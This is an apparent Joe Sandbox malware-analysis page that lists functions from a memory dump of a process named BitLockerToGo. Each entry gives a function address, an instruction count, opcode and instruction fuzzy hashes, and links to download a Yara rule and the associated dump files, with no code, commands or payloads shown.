Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
Instruction ID: cfe73828968bfc0544e27176adab3e26b07aa09fb4d06cd7cb1624b482e5a815
Opcode Fuzzy Hash: 7240b8de29aa9ea456cfb7fec80e2f6c6a8e61c11f2659c23afef4199018a829
Instruction Fuzzy Hash: 62C157B2A487418FC370DF68CC86BABB7E1EB85318F18492DD1D9C7242E778A155CB46

Function 026E1DB5 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cc4cc67d90b0f28682ff8ead5c6b6fc8af25e92ffc5ad4ebbcdd6b691cae04
Instruction ID: dbd15bff64dd7475faae4d5bcb339694553907ebbeefa28411aae74e5cc5fe35
Opcode Fuzzy Hash: d0cc4cc67d90b0f28682ff8ead5c6b6fc8af25e92ffc5ad4ebbcdd6b691cae04
Instruction Fuzzy Hash: B2A1F532E45290CFDB188F38D89079DB7B3BF4A320F5982A8E8966B2D5C7719C55CB50

Function 026D8FD5 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
Instruction ID: dcbd35cc8b0d763447fd72248a40321be23d3f66cc32ef1eb6f8a19320e25066
Opcode Fuzzy Hash: 7975fa0fe6a312e73b73def21946adc82cbb3bca22f600f7caed32f8a8cef404
Instruction Fuzzy Hash: 2FC1FAF181AB80AAD310BB74D90530ABEA5EF5130AF058D6DC9D98B352E275911CDFA3

Function 026EEF89 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
Instruction ID: da8999313f7ed849f59f453f2c3c7b15e3f1360f76a9274a51147579d8ae0f79
Opcode Fuzzy Hash: dabbc883d107179a82327ff4fed8f602213700a0700e2ea5b86482edca5589ba
Instruction Fuzzy Hash: 6BB1C7B18197818BC304AFB49A0521EBEA1EF52309F85896CC5D98B381E7B4951DCBE7

Function 026FF9E0 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0162a379cbac9bb6602dc6f825b593573a1806e96e1fde8cc4ff698e2a0ab345
Instruction ID: 0c6bd068ede28072c1760c208055da694a7ee1c58e8eba5a8d03e16d7d384eca
Opcode Fuzzy Hash: 0162a379cbac9bb6602dc6f825b593573a1806e96e1fde8cc4ff698e2a0ab345
Instruction Fuzzy Hash: 7D91AD75608316CBCB14DF18D890A2AB3E2EF85754F15896CEA958B3A1EB31EC51CB81

Function 026EE2AC Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
Instruction ID: d8e74e3fb4adee35de4779b427be3bf72a43ed3a144cdaae3fe4f3b0676b07a0
Opcode Fuzzy Hash: 08f125c79503abe8501a08a4e148f1f8a53f9b7536fec694ae15afa04bf3d2c3
Instruction Fuzzy Hash: 9EB1D9B18196818BC304AFF49A0521EBEB1EF52309F85896CC5D98B381E7B4951DCBE7

Function 026D1B6E Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9e5a857c5afe10499ca52527dc0d4920fe441ed8c4ba4553612640b6ec8d69
Instruction ID: 6bdce451761e4a55d074117199fb7a3752192dc50f627738cd34d062aea657f6
Opcode Fuzzy Hash: 7c9e5a857c5afe10499ca52527dc0d4920fe441ed8c4ba4553612640b6ec8d69
Instruction Fuzzy Hash: 35A10271E08351CBC724CF28C89062AB3E2FFC5724F194AACE5999B394EB75D851CB42

Function 026FF6F0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c60f7aa45763f6bc4e834fd38aa4b2397b574c7653ce9c62b42f868d9e5f510
Instruction ID: 9c23c0cdcbf8a0f757c3d0163deef0a16b81ea27fced7932ffa996eefe79f30c
Opcode Fuzzy Hash: 6c60f7aa45763f6bc4e834fd38aa4b2397b574c7653ce9c62b42f868d9e5f510
Instruction Fuzzy Hash: 5191C075A093129BCB14DF18D880A2AB7B2FF88714F15892CEAC55B7A5E731E811CB91

Function 026FD9AD Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62a4c96431a065d5a4cd20ca1c32713dfd213d6a58ccd99c3edffabe8a1d553
Instruction ID: 7771057d3b9a7d4c6d81ccfc5817e37527f289b3bad36632ce8a904d91da0f07
Opcode Fuzzy Hash: d62a4c96431a065d5a4cd20ca1c32713dfd213d6a58ccd99c3edffabe8a1d553
Instruction Fuzzy Hash: E4A10236E58251CFC708CF29E48002AF7E2FB89355F09896CE98597385CB31ED65CB81

Function 026C1000 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2981d12f940ad1e9b25ccc5f473c47b349a3bd7ecaa17b6735605af692695a17
Instruction ID: 1a878908759a16f04102f519e79870a2e77e1dd780dd56c2d95c4e72a1d540c4
Opcode Fuzzy Hash: 2981d12f940ad1e9b25ccc5f473c47b349a3bd7ecaa17b6735605af692695a17
Instruction Fuzzy Hash: 9761263A569280CFD7154F34E4F33BB7BA9EB06359F498DAD9192466C1CA39812CCB11

Function 026F57E0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd7e67c71fca43e499f3b871940b55849b0c8863c6c3ce28992cc683c7bab39
Instruction ID: dd9fb7db0a9cc37c1d6ceb8146b3b8dc6e386e65102d39da9ad124d1b6534f30
Opcode Fuzzy Hash: 2bd7e67c71fca43e499f3b871940b55849b0c8863c6c3ce28992cc683c7bab39
Instruction Fuzzy Hash: BE516BB15087548FE714DF29D49435BBBE1BBC4318F444A2DE5EA87350E379DA088F86

Function 026DE411 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59086794cbaa863d33e79acfe08dd1e5bb633fa14f4b0cefc3f392b39a025332
Instruction ID: 37974c95a92f731761d83a47e51b7d25ffeaa65d734c461353ad9796eb8f78c5
Opcode Fuzzy Hash: 59086794cbaa863d33e79acfe08dd1e5bb633fa14f4b0cefc3f392b39a025332
Instruction Fuzzy Hash: 4C6146B0900359CFDB24CF96CA84A6ABBB1FF45300F14898CD4566F7A6C335A905CF95

Function 026DD940 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a5968c951edc34631e488498a90f73b35e12255afbb914b9bfbf9f2c5366b9
Instruction ID: 4298b355e5bc2f4ce776f1a5632b0d7d759b9704074e512472ac99405b1b94b8
Opcode Fuzzy Hash: f8a5968c951edc34631e488498a90f73b35e12255afbb914b9bfbf9f2c5366b9
Instruction Fuzzy Hash: D65156B090C3809BD314EF19C490B2ABBE1EF96758F149E0CE1D59B3A1C7359951CB9A

Function 026CDB90 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497315bc5903373fd7065c6ce6e2be63184ed00f73d055984d2cbbae21717b3c
Instruction ID: 7cc8d4c182b35d76b32ca9d5decf55516a46864b3e234298cb9a681f102dd6f3
Opcode Fuzzy Hash: 497315bc5903373fd7065c6ce6e2be63184ed00f73d055984d2cbbae21717b3c
Instruction Fuzzy Hash: FE4120B6A082A04FD318DE3A889023ABBD2ABC5214F69C63DF4A5C7394E6748506D750

Function 026E5B9D Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3121f8f5a0f67be903df0b47ca02edfcf4cf31be344c8930a7dfba720e053bd9
Instruction ID: ca0d592555751c60ebe063702403952c08360f080d80b48b6d7e391d4f72f8da
Opcode Fuzzy Hash: 3121f8f5a0f67be903df0b47ca02edfcf4cf31be344c8930a7dfba720e053bd9
Instruction Fuzzy Hash: 7841C4B644E3C09ED350AFA8DA4035EBBE2AFA1745F05882DE2D48B342C276D548DF57

Function 026E6206 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f3362e92b9ad200e237da3fd43e9ff3808e324bec770af1178076eae2b4150
Instruction ID: 2e8de0198c5f0e20f0f3c7ac55cb9bc0b6b3384ec4741ef17083d8a2ffd7e660
Opcode Fuzzy Hash: 88f3362e92b9ad200e237da3fd43e9ff3808e324bec770af1178076eae2b4150
Instruction Fuzzy Hash: 4641C7B544E3818ED310AFA8DA4035FBBE2AFA1B45F05882EE2D487742D279D548DF53

Function 026DA4EA Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b6dec5ec73e13760da823adac6fe10355a043f347c3fb127f1e54ae5c29dd7
Instruction ID: 43dc16e011066f0c5b3e849847214b19d50e1b25d3dc55a8c0af8a8e897db9bd
Opcode Fuzzy Hash: d4b6dec5ec73e13760da823adac6fe10355a043f347c3fb127f1e54ae5c29dd7
Instruction Fuzzy Hash: D441CFB141E3849ED350AF64D24135EBAE1FFA6709F859C1EE0C8A7242C3788549DF67

Function 026C3E70 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
Instruction ID: 28b8ded40cd22605b6cf28ca3762309a5233e0aabbed0c5a497fee51b1fbb82c
Opcode Fuzzy Hash: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
Instruction Fuzzy Hash: 523177716042019BD714AE58D880A7BB7E1EFCC319F24C9AEE8959B341D335DC62CBC6

Function 026C4C20 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665f4119cbbe0062a6e181fca58602f694c453c9ba8d670a1b8d8ab4b6a72e08
Instruction ID: ad6847907f2c64f611af3ba05416d6a6b3d08b1b2bd91420336148eea174a365
Opcode Fuzzy Hash: 665f4119cbbe0062a6e181fca58602f694c453c9ba8d670a1b8d8ab4b6a72e08
Instruction Fuzzy Hash: 2511E136B542218BE798DE62D8F263A7392FB8522071A012DDE4397392CE21E415D2A0

Function 026F1950 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: b01f98848615cac78e462bc5065afd7bc6c93efd6791502687c4cae115d8fb7a
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 8111C233A051D58EC7168D3C84005B5BFA31AA31B4B5D83DAE8FC9B2D6D623898A8395

Function 026E4640 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
Instruction ID: 7c10f427080361f8f1441dc7ecc8a303497eece2bd14ab846a74de2c2a639e96
Opcode Fuzzy Hash: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
Instruction Fuzzy Hash: AA0171F160270147DF20AE65A4D0737B3A9AF85708F28482CD91A97305DF75EC05DAA9

Function 026D3A50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
Instruction ID: b302a49cb6e7293c72b329811814f25c7352721132889bcade18d029658418ce
Opcode Fuzzy Hash: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
Instruction Fuzzy Hash: C1F0A7B1F0415857DB228D549CC4B37BBACCB86254F1D1469E845A7301E262585487F7

Function 026DDBEA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08354e4a6d8efdb94e50eca401ea1e324bfef836f22d42024e042a007fbc9c1
Instruction ID: 055dce29f3d7eff21a56590431222b40425494bf4e19c5654119b96d8433679d
Opcode Fuzzy Hash: e08354e4a6d8efdb94e50eca401ea1e324bfef836f22d42024e042a007fbc9c1
Instruction Fuzzy Hash: E8E0CDADC08302C6C704AF10C85057AB3B5EF83249F00285DFC8157350E774C545D36A

Function 026F90C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: e3e8c1481c24a0b9f5bf14667735155426ea216f6e777f9b9001903ad55648d5
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 13D0A722609362469FB88E19A410A77F7F0EAC7B11F49955FF786E3348D730D841C2AD

Function 026FA796 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c0a2cb97f524fbd81d4bf2b8e1c06be9cefa8b60d4d32dccc500cda34a5789
Instruction ID: 42873937eb39dfb5cff75c7fad2ddd2c54872f7aa0cac7616ba552560a35f726
